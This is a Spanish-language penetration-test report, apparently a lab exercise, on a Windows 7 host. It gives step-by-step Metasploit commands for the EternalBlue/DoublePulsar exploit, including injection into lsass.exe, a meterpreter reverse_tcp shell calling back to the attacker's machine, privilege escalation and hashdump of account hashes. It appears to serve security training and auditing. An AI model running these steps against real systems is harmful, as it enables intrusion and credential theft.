1. Objetivo y Alcance:
|
El objetivo
de este análisis de seguridad es conocer el estado de seguridad del host y mostrar un reporte de cada uno de los
agujeros de seguridad que vaya encontrando.
WINDOWS ip:
192.168.153.143
|
Cabe
destacar la importancia de un proceso de pentesting. Como son:
2. SUMARIO EJECUTIVO:
|
Se ha
dispuesto a realizar una auditoría de seguridad sobre el equipo: WINDOWS, así
como fallos potenciales que podría tener la misma.
Existen
innumerables quiebras de seguridad en relación a la infraestructura y
aplicación web que podrían afectar a la integridad, privacidad,
confidencialidad o disponibilidad de los datos, así como del acceso al
servidor.
Se han
detectado diferentes vulnerabilidades clasificadas por el nivel de las mismas,
es decir, hay vulnerabilidades que requieren una atención mayor puesto que
presentan una quiebra de manera crítica en este dominio que otras que muestran un
nivel básico en lo que al riesgo se refiere.
Existen
algunas otras vulnerabilidades de nivel bajo que no suponen a día de hoy
realmente un riesgo real para la aplicación, aunque se recomienda solucionarlas
ya que en un futuro su nivel de riesgo podría aumentar debido a la combinación
de estas con otras posibles vulnerabilidades de más nivel.
3. Detalle de resultados técnicos.
|
Después del
proceso de recolección de información llevado a cabo por nmap o por nessus
entre otras herramientas, cabe destacar el hecho de que hay varias formas de
vulnerar una máquina. Por medio de la utilización de exploits de forma remota,
yo he utilizado armitage por ejemplo, pero hay otras herramientas, mediante de
los llamados ataques del lado del cliente que para este caso no ha sido posible
y el ultimo por del uso de credenciales o Pass the Hash.
4. VULNERABILIDADES:
|
Se observa
mediante el uso de nmap se observa que se trata de un Windows 7 y por esto se
hace referencia un exploit que tuvo bastante repercusión como es EthernalBlue.
Es un exploit supuestamente desarrollado por la NSA. Fue filtrado por el grupo
de hackers "Shadow Brokers" el 14 de abril de 2017, y fue utilizado
en el ataque mundial de ransomware con WannaCry del 12 de mayo de 2017.
EternalBlue
aprovecha una vulnerabilidad en la implementación del protocolo Server Message
Block (SMB) de Microsoft. Esta vulnerabilidad, denotada como CVE-2017-0144 en
el catálogo Common Vulnerabilities and Exposures (CVE), se debe a que la
versión 1 del servidor SMB (SMBv1) acepta en varias versiones de Microsoft
Windows paquetes específicos de atacantes remotos, permitiéndoles ejecutar
código en el ordenador en cuestión.
Básicamente
tienes una herramienta llamada Eternalblue que lo agregamos a metasploit para
ejecutarla, funciona con Windows 7 o Windows Server 2008 para obtener una
shell.
Ahora el
método funciona con un Windows 64bits y un Kali Linux 64bits con un soporte o
arquitectura de 32bits para wine.
sudo dpkg
--add-architecture i386
apt-get install wine32
Tienes que
desactivar los firewall, cuando lo tengas activado el exploit se va a reventar
y no ejecutar.
Recuerda a
Windows 7 64bits SP1, no necesitas instalar algo.
git clone
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Ahora
descargamos la herramienta, observaron la URL, algunas personas me entenderán
porque no quería bajarlo.
Ahora vamos
a jugar.
cd Eternalblue-Doublepulsar-Metasploit
cp
eternalblue_doublepulsar.rb
/usr/share/metasploit-framework/modules/exploits/windows/smb/
Lo que
hicimos fue agregar el modulo a metasploit
service postgresql
start
use exploit/windows/smb/eternalblue_doublepulsar
show options
set DOUBLEPULSARPATH
/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
set ETERNALBLUEPATH
/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
set PROCESSINJECT
lsass.exe
lsass.exe es
solo para windows de 64bits
set RHOST 192.168.153.143
Recuerda RHOST es la IP de tu víctima
set TARGETARCHITECTURE
x64
set target 8
Agregamos target para windows 7
set PAYLOAD
windows/x64/meterpreter/reverse_tcp
El PAYLOAD
tiene que ser exclusivo para 64bits
set LHOST 192.168.1.5
Recuerda IP
de tu maquina
Ahora
ejecutar el exploit.
Mediante el
comando de getsystem vemos que somos Admin, es decir somos root
Hay varios
parámetros como por ejemplo hashdump para coger los hashes de las cuentas de
usuarios que hay para poder descifrarlos posteriormente.
Al crear la
Shell vemos que pertenecemos a la carpeta de System32, tenemos privilegios.
Podríamos
hacer lo que queramos, la maquina estaría vulnerada
5. CONCLUSION:
|
Como
conclusión cabe destacar la importancia de configurar de actualizar nuestro
Windows con el fin de no facilitar a un atacante el uso de diferentes exploits
que puedan mostrar el control total de nuestro equipo